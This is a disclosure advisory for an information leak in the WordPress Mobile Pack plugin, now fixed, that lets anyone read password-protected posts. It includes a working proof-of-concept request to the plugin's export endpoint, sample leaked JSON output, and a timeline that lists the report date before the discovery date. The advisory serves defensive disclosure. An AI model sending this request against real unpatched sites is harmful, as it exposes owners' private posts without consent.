CVSS Summary
| Score | 5 Medium |
|---|---|
| Vector | Network |
| Complexity | Low |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | None |
| Availability | None |
Advisory:
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts
Vulnerability
Last revised:
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).
Current state: Fixed
Proof of concept
- Create a password-protected post
- Enable WordPress Mobile Pack
- Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
- Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”
Example output:
x (
{
"articles": [
{
"id": 849,
"title": "Secret post",
"timestamp": 1406231170,
"author": "admin",
"date": "Thu, Jul 24, 2014, 19:46",
"link": "http://wp.local/?p=849",
"image": "",
"description": "<p>HUSH THIS IS A SECRET</p>n",
"content": "",
"category_id": 1,
"category_name": "Uncategorized"
}
]
}
)
Advisory timeline
- 2014-07-24: Discovered
- 2014-07-13: Reported to developer via email
- 2014-08-19: Developer reported the issue fixed
- 2014-08-20: Advisory published
Mitigation/further actions
Upgrade to version 2.0.2 or later